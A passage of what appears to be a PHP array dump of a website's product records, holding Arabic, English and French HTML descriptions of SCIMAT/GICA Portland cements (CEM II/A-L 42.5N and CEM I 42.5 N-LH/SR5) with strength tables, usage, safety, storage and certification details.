<p style="text-align:justify"><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> اغسل جميع المناطق المكشوفة على الفور بكمية كبيرة من الماء ؛</span></span></span></p>
</li>
<li style="text-align:left">
<p style="text-align:justify"><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> في حالة ملامسة العين لا بد من استشارة الطبيب.</span></span></span></p>
</li>
</ul>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">لمزيد من التفاصيل ، يرجى الرجوع إلى ورقة بيانات السلامة التفصيلية. </span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><u><strong>البيئة</strong></u><strong>:</strong></span></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">تهدف SCIMAT إلى أن تكون بشكل دائم مثالاً للمسؤولية البيئية للمجتمع من خلال حماية البيئة ، بما في ذلك منع التلوث واستخدام الموارد المستدامة من خلال:</span></span></p>
<ul dir="rtl">
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> الحفاظ على الموارد الطبيعية ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> الحد من انبعاثات الغلاف الجوي ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> التمكن من إدارة النفايات</span></span></p>
</li>
</ul>
<p dir="rtl" style="text-align:justify"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#40E0D0"><strong><u>التخزين:</u> </strong></span></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">يجب تخزين الأسمنت في مكان جاف وحمايته من الرطوبة</span></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#40E0D0"><strong></strong></span></span></span><br />
</p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#40E0D0"><u><strong>التكييف</strong></u><strong> : </strong></span><span style="color:#008000"><strong> </strong></span></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">يتم تسليم الأسمنت البورتلاندي <strong>CEM II A-L 42.5 N</strong> سائبًا وفي أكياس سعة 50 كجم. </span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#000080"><strong> <u>الشهادة</u> :</strong></span></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif; font-size:16px">تم اعتماد </span><strong>CEM II / A (P-L) 42.5N</strong><span style="font-family:times new roman,times,serif; font-size:16px"> وفقًا للمعيار الجزائري </span><strong>2013/442</strong><span style="font-family:times new roman,times,serif; font-size:16px"> مع علامة المطابقة الوطنية </span><strong>TEDJ</strong><span style="font-family:times new roman,times,serif; font-size:16px"> الصادرة عن المعهد الجزائري للتقييس -IANOR-.</span></p>
',
'contenu_en' => '<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><u><strong>Composition</strong></u><strong> :</strong></span><br />
The <strong>Cement Portland</strong> with Limestone <strong>CEM II/A-L 42,5N -NA 442/2013</strong>- results from the mixture of clinker in a quantity at least equal to 88-82% and other constituents such as Tuff & Pozzolana, the total of which does not exceed 7-13%.</span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><u><strong>Limit Values</strong></u></span><strong> :</strong></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The limit values for minimum strengths are set for 2 and 28 days. The limit values are also set for the SO3 content below 3.5% and the chloride ion content below 0.10%.</span></span></p>
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><span style="color:#008000">Compressive strength limit value for CEM II / A-L 42.5N -NA 442/2013-</span></strong></span></span></p>
<table align="center" border="1" cellpadding="0" cellspacing="0" style="height:413px; width:425px">
<tbody>
<tr>
<td style="height:88px; width:110px">
<p style="text-align:center"> </p>
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Resistance Class</strong></span></span></p>
<p style="text-align:center"> </p>
<p style="text-align:center"> </p>
</td>
<td style="height:88px; width:142px">
<p style="text-align:center"> </p>
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Limit of Resistance according to Standard NA 442</strong></span></span></p>
</td>
<td style="height:88px; width:120px">
<p style="text-align:center"> </p>
<div class="QmZWSe">
<div class="DHcWmd" style="text-align: center;"> </div>
</div>
<div class="oSioSc">
<div id="tw-target">
<div class="g9WsWb" id="kAz1tf">
<div class="tw-ta-container hide-focus-ring tw-nfl" id="tw-target-text-container">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Specified Lower Limit<br />
of our Cement</strong></span></span></p>
</div>
</div>
</div>
</div>
<p style="text-align:center"> </p>
</td>
<td style="height:88px; width:151px">
<p style="text-align:center"> </p>
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Specified Upper Limit of our Cement</strong></span></span></p>
<p style="text-align:center"> </p>
</td>
</tr>
<tr>
<td style="height:85px; width:110px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>02 days</strong></span></span></p>
</td>
<td style="height:85px; width:142px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>≥ 10,0</strong></span></span></p>
</td>
<td style="height:85px; width:120px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>22.08</strong></span></span></p>
</td>
<td style="height:85px; width:151px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>25.98</strong></span></span></p>
</td>
</tr>
<tr>
<td style="height:57px; width:110px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>28 days</strong></span></span></p>
</td>
<td style="height:57px; width:142px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>62.5≤res≥42,5</strong></span></span></p>
</td>
<td style="height:57px; width:120px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>44,18</strong></span></span></p>
</td>
<td style="height:57px; width:151px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>48.49</strong></span></span></p>
</td>
</tr>
</tbody>
</table>
<div style="clear:both;"> </div>
<div style="clear:both;">
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><u><strong>Quality Control</strong></u><strong> :</strong></span></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">SCIMAT manufactures and markets <strong>Quality</strong> Cements in accordance with Algerian Standards in force. They are periodically checked by the Center for Studies and Technological Services of the Building Materials Industry -CETIM- (accredited according to the ISO 17025 Standard).</span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u><strong><span style="color:#008000">Main fields of employment</span></strong></u><strong><span style="color:#008000"> :</span></strong></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The <strong>CEM II/A-L 42,5N</strong> -<strong>NA 442/2013-</strong>is suitable for all types of reinforced concrete work. Our Cement is suitable for prestressed concrete and reinforced concrete. In general, the<strong> CEM II/A-L 42,5N</strong> -<strong>NA 442/2013-</strong> is well suited for massive work requiring a moderate rise in temperature. The Class R will be preferred for work requiring higher initial strengths. For work in aggressive environments, the Cement will be used for work at sea (PM) or resistant to sulphated water (ES).</span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><u><strong>Special precautions</strong></u><strong> :</strong></span></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">When the aesthetic aspect is important (raw concrete, plasters), it is advisable to avoid the use of certain <strong>CEM II</strong> comprising large proportions of constituents liable to cause too marked variations in color, particularly fly ash.</span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><u><strong>Specific and General Recommendations</strong></u><strong> :</strong></span></span></span></p>
<ul>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Use clean aggregates, free from organic matter;</span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Respect the dosages and the rules of the art for the<br />
implementation;</span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Aim for a Water /Cement ratio, preferably as low<br />
as possible, compatible with good rheology of<br />
fresh concrete;</span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Use standardized adjuvants;</span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Avoid premature drying out in hot or windy weather by curing the concrete (watering, damp tarpaulin, curing products, etc.); </span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Adapt the vibration of the concrete to its consistency<br />
to obtain optimum compactness without segregation;</span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Avoid all contact with skin and eyes;</span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Use suitable equipment : gloves, waterproof shoes, glasses, etc.</span></span></li>
</ul>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#FF0000"><strong><u>Security</u> :</strong></span></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The SCIMAT aims to be the safest employer in the Society by improving working conditions to avoid any bodily injury and health repercussions related to its activities.</span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><u><strong>Protective Measures</strong></u><strong> :</strong></span></span></span></p>
<ul>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> Mix with water, the Cement is irritating;</span></span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> Avoid contact with eyes and skin;</span></span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> Immediately wash all exposed areas with plenty of water;</span></span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> In the event of contact with the eyes, it is essential to consult a doctor.</span></span></span></li>
</ul>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">For more details, please refer to the detailed Safety Data Sheet.</span></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u><strong><span style="color:#008000">Environment</span></strong></u><strong><span style="color:#008000"> :</span></strong></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">The SCIMAT aims to be a constant example of the ecological responsibility of the </span>Society<span style="color:#000000"> through the protection of the environment, including the prevention of pollution and the use of sustainable resources by:</span></span></span></p>
<ul>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> Preservation of natural resources;</span></span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> Reduction of atmospheric emissions;</span></span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> Mastery of waste management.</span></span></span></li>
</ul>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#40E0D0"><u><strong>Storage</strong></u><strong> :</strong></span></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The Cement must be stored in a dry place and protected from humidity.</span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#40E0D0"><strong><u>Conditioning</u> :</strong></span><br />
The <strong>Cement Portland CEM II / AL 42.5N-NA 442/2013-</strong> is delivered in bulk and in bags of 50 kg.</span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u><strong><span style="color:#4B0082">Certification</span></strong></u><strong><span style="color:#4B0082"> :</span></strong></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The <strong>Cement Portland CEM II / AL 42.5N</strong> is certified according to the <strong>Algerian Standard 442/2013</strong> with the National Conformity Mark <strong>TEDJ</strong> issued by the Algerian Institute for Standardization -IANOR-.</span></span></p>
</div>
',
'img_prd' => 'produit-1716888973.png',
'img_prd_detail' => '',
'Code_Pr' => '78999',
'prix_u' => '0',
'fiche_technique' => 'fiche_technique-1716804329.pdf',
'pos_slider' => '9'
),
'Environement' => array(),
'Pemploi' => array(),
'Securite' => array(),
'Specification' => array(),
'Stockage' => array(),
'typecomposition' => array(),
'Caracteristique' => array(),
'Controlequalite' => array()
),
(int) 6 => array(
'Produit' => array(
'id' => '89963',
'nom_fr' => 'GICA MOUDHAD ',
'nom_ara' => 'جيكا مضاد',
'nom_en' => 'GICA MOUDHAD',
'sous_nom_fr' => 'CEM I 42.5 N-LH/SR5',
'sous_nom_ara' => 'CEM I 42.5 N-LH/SR5',
'sous_nom_en' => 'CEM I 42.5 N-LH/SR5',
'date_ajout' => '2021-01-27',
'image' => '',
'contenu_fr' => '<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><u><strong>Composition</strong></u><strong> :</strong></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:black">Le <strong>Ciment CEM I/42.5 N-LH/SR5 -NA 442/2013</strong>- </span> est un Ciment Portland résultant du broyage de clinker et de sulfate de calcium (gypse ou anhydrite) pour régulariser la prise, et éventuellement de constituants secondaires en faible quantité inférieure à 5 %. La teneur en clinker est au minimum de 95 %.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><span style="color:#008000"><u>Valeurs limites</u> :</span></strong></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">En plus des valeurs caractéristiques des classes de résistance, la Norme prévoit le respect de valeurs limites de résistance à la compression applicables à chaque résultat d’essai. Ces résistances sont mesurées sur «mortier normal» selon la <strong>Norme NA 442-2013 </strong>inspirée de la <strong>Norme Européenne NF EN 196-1</strong>.</span></span></p>
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><strong>Valeur Limite de Résistance à la Compression pour CEM I/42.5 N-LH/SR5</strong></span></span></span></p>
<table align="center" border="1" cellpadding="0" cellspacing="0" style="height:339px; width:420px">
<tbody>
<tr>
<td style="height:104px; width:117px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Classe de Résistance</strong></span></span></p>
</td>
<td style="height:104px; width:145px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Limite de la Résistance selon la Norme NA 442</strong></span></span></p>
</td>
<td style="height:104px; width:123px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Limite Inférieure Spécifiée de notre Ciment</strong></span></span></p>
</td>
<td style="height:104px; width:139px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Limite Supérieure Spécifiée de notre Ciment</strong></span></span></p>
</td>
</tr>
<tr>
<td style="height:29px; width:117px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>02 jours</strong></span></span></p>
</td>
<td style="height:29px; width:145px">
<p style="text-align:center"> </p>
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>≥ 10,0</strong></span></span></p>
<p style="text-align:center"> </p>
</td>
<td style="height:29px; width:123px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><span style="color:black">21,36</span> </strong></span></span></p>
</td>
<td style="height:29px; width:139px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><span style="color:black">27,71</span></strong></span></span></p>
</td>
</tr>
<tr>
<td style="height:48px; width:117px">
<p style="text-align:center"> </p>
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>28 jours</strong></span></span></p>
<p style="text-align:center"> </p>
</td>
<td style="height:48px; width:145px">
<p style="text-align:center"> </p>
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><span style="color:black">62.5≤res≥42,5</span> </strong></span></span></p>
<p style="text-align:center"> </p>
</td>
<td style="height:48px; width:123px">
<p style="text-align:center"> </p>
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><span style="color:black">44,82</span> </strong></span></span></p>
<p style="text-align:center"> </p>
</td>
<td style="height:48px; text-align:center; width:139px">
<p> </p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>54,53</strong></span></span></p>
<p> </p>
</td>
</tr>
</tbody>
</table>
<div style="page-break-after: always"><span style="display:none"> </span></div>
<p> </p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Les propriétés chimiques, qui sont un facteur important de la résistance des bétons à des ambiances agressives, concernent la teneur en anhydride sulfurique (SO3) inférieure à 3.0 % (3,5 % pour les classes 42,5 R et 52,5) et en ions chlorure inférieure à 0,10 %.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><strong><u>Contrôle de la Qualité</u> :</strong></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La SCIMAT fabrique et commercialise des Ciments de <strong>Qualité </strong>conformément aux Normes Algériennes en vigueur. Ils sont contrôlés périodiquement par le Centre d’Études et de Services Technologiques de l’Industrie des Matériaux de Construction -CETIM-(accrédité selon le Référentiel ISO 17025). </span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><span style="color:#008000"><u>Principaux domaines d’emploi</u> </span><span style="color:green">:</span></strong></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>Ciment CEM I / 42.5 N-LH/SR5 </strong>convient pour le béton<a href="https://www.infociments.fr/glossaire/beton-arme" title="Béton armé"> </a>armé ou le béton précontraint, en revanche leurs caractéristiques mécaniques n’en justifient généralement pas l’emploi pour les travaux de maçonnerie courante et les bétons en grande masse ou faiblement armés.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>Ciment CEM I / 42.5 N-LH/SR5</strong> permet un décoffrage rapide appréciable notamment en préfabrication. </span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Pour les travaux en milieu agressif, eaux de mer ou eaux sulfatées, on emploiera respectivement le Ciment Portland <strong>CEM I 42.5 N-LH/SR5 </strong>pour travaux à la mer PM, ou pour travaux en eaux à haute teneur en sulfates ES.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><u><span style="color:#008000">Précautions particulières</span></u><span style="color:green"> :</span></strong></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Pour les ouvrages massifs, on évitera l’utilisation du <strong>Ciment CEM I 42.5 N-LH/SR5 </strong>dont la chaleur d’hydratation risque de conduire à une élévation de température excessive lors de leur réalisation.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><strong><u>Recommandations Spécifiques et Générales</u> :</strong></span></span></span></p>
<ul>
<li>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Utiliser des granulats propres, exempts de matières organiques;</span></span></span></p>
</li>
<li>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Respecter les dosages et les règles de l’art pour la mise en œuvre;</span></span></span></p>
</li>
<li>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Viser un rapport Eau/Ciment de préférence le plus faible possible, compatible avec une bonne rhéologie du béton frais;</span></span></span></p>
</li>
<li>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Utiliser des adjuvants normalisés;</span></span></span></p>
</li>
<li>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Éviter une dessiccation précoce par temps chaud ou venteux en réalisant une cure du béton (arrosage, bâche humide, produits de cure…);</span></span></span></p>
</li>
<li>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Adapter la vibration du béton à sa consistance pour obtenir une compacité optimale sans ségrégation;</span></span></span></p>
</li>
<li>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Éviter tout contact avec la peau et les yeux;</span></span></span></p>
</li>
<li>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Utiliser des équipements adaptés : gants, chaussures imperméables, lunettes…</span></span></span></p>
</li>
</ul>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#FF0000"><u><strong>Sécurité</strong></u> :<strong> </strong></span></span></span></p>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La SCIMAT vise à être l'employeur le plus sûr de la Société par l’amélioration des conditions de travail pour éviter toutes blessures corporelles et répercussions sanitaires liées à ses activités.</span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u><span style="color:#008000"><strong>Mesures de Protection</strong></span></u><span style="color:#008000"><strong> :</strong></span></span></span></p>
<ul>
<li>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Mélanger à l'eau, le Ciment est irritant; </span></span></span></p>
</li>
<li>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Éviter le contact avec les yeux et la peau;</span></span></span></p>
</li>
<li>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Laver immédiatement et abondamment à l'eau toute zone exposée; </span></span></span></p>
</li>
<li>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">En cas de contact avec les yeux, consulter impérativement un médecin. </span></span></span></p>
</li>
</ul>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Pour plus de détails,Veuillez- vous reporter à la Fiche de Données de Sécurité détaillée.</span></span></span></p>
<div class="source_url_spacer">
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><u><strong>Environnement</strong></u><strong> :</strong></span></span></span></p>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La SCIMAT vise à être en permanence un exemple de la responsabilité écologique de la Société par la protection de l’environnement, y compris la prévention de la pollution et l’utilisation de ressources durables et ce par<em> </em> :</span></span></span></p>
<ul>
<li>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La préservation des ressources naturelles;</span></span></span></p>
</li>
<li>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La réduction des rejets atmosphériques;</span></span></span></p>
</li>
<li>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La maitrise de la gestion des déchets. </span></span></span></p>
</li>
</ul>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#40E0D0"> <u><strong>Stockage</strong></u><strong> :</strong></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Le Ciment doit être stocké au sec et protégé de l'humidité. </span> <span style="color:#008000"><strong> </strong></span></span></span></p>
<p><span style="color:#40E0D0"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><u>Conditionnement</u> :</strong></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Le </span><strong>Ciment CEM I 42.5 N-LH/SR5</strong><span style="color:#000000"> est livré en vrac et en sacs de 50 kg.</span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><u><span style="color:#000080">Certification</span></u><span style="color:#000000"> :</span></strong></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Le </span><strong>Ciment CEM I 42.5 N-LH/SR5 </strong><span style="color:#000000"> est certifié selon la <strong>Norme Algérienne 442/2013 </strong>à la Marque de Conformité Nationale <strong>TEDJ</strong> délivrée par l’Institut Algérien de Normalisation -IANOR-.</span></span></span></p>
</div>
',
'contenu_ara' => '<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><u><strong>التركيبة :</strong></u></span></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong> </strong></span></span><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>الاسمنت</strong></span></span></small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong>CEM I / 42.5 N-LH/SR5</strong> هو اسمنت بورتلاند ناتج عن طحن الكلنكر وكبريتات الكالسيوم (الجبس أو الأنهيدريت) لتنظيم الإعداد ، وربما المكونات الثانوية بكميات صغيرة بنسبة 5٪. محتوى الكلنكر 95٪ على الأقل.</span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><u><strong>القيم الحدية</strong></u></span></span></span> <span style="color:#008000"><strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> :</span></span></strong></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">بالإضافة إلى القيم المميزة لفئات القوة ، توفر المواصفة القياسية الامتثال لقيم حد مقاومة الانضغاط المطبقة على كل نتيجة اختبار. يتم قياس هذه المقاومة على "ملاط عادي" وفقًا للمعيار <strong>NA 442-2013</strong> المستوحى من المعيار الأوروبي <strong>NF EN</strong> <strong>196-1</strong>.</span></span></p>
<p dir="rtl" style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><strong>قيمة حد مقاومة الضغط لـ</strong> </span></span></span><span style="color:#008000"><strong><span style="font-family:georgia,serif; font-size:12.0pt">CEM I / 42.5 N-LH/SR5</span></strong></span></p>
<table align="center" border="1" cellpadding="0" cellspacing="0" dir="rtl">
<thead>
<tr>
<th scope="col" style="height:104px; width:117px">
<p style="text-align:center"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>فئة المقاومة</strong></span></span></small></p>
</th>
<th scope="col" style="height:104px; width:145px">
<p style="text-align:center"> </p>
<p style="text-align:center"><strong><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px">حد القوة وفقًا للمعيار<br />
NA 442</span></span></small></strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong> </strong></span></span></p>
<p style="text-align:center"> </p>
</th>
<th scope="col" style="height:104px; width:123px">
<p dir="rtl" style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>الحد الأدنى المحدد </strong></span></span><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>لاسمنت SCIMAT</strong></span></span></small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong> </strong></span></span></p>
</th>
<th scope="col" style="height:104px; width:139px">
<p style="text-align:center"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>الحد الأعلى<br />
المحدد لاسمنت SCIMAT</strong></span></span></small></p>
</th>
</tr>
</thead>
<tbody>
<tr>
<td style="height:30px; text-align:center; width:117px">
<p><strong>يومان</strong></p>
</td>
<td style="height:30px; text-align:center; width:145px">
<p><strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> 10 </span></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:black">≤</span></span></span></strong></p>
</td>
<td dir="ltr" style="height:30px; text-align:center; width:123px">
<p><strong><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:black">21,36</span></span></span></strong></p>
</td>
<td style="height:30px; text-align:center; width:139px"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong><span style="color:black">27,71</span></strong></span></span></td>
</tr>
<tr>
<td style="height:30px; text-align:center; width:117px">
<p><span style="font-size:16px"><strong>28 يوم</strong></span></p>
</td>
<td style="height:30px; text-align:center; width:145px">
<p><strong><span style="font-family:times new roman,times,serif"><span style="font-size:14px"><span style="color:black">42,5 ≤ <span dir="ltr" lang="fr">res</span>≥62,5</span></span></span></strong></p>
</td>
<td style="height:30px; text-align:center; width:123px"><strong><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:black">44,82 </span></span></span></strong></td>
<td style="height:30px; text-align:center; width:139px"><strong><span style="font-family:times new roman,times,serif"><span style="font-size:16px">54,53</span></span></strong></td>
</tr>
</tbody>
</table>
<div style="clear:both;">
<div style="clear:both;"> </div>
<div style="clear:both;">
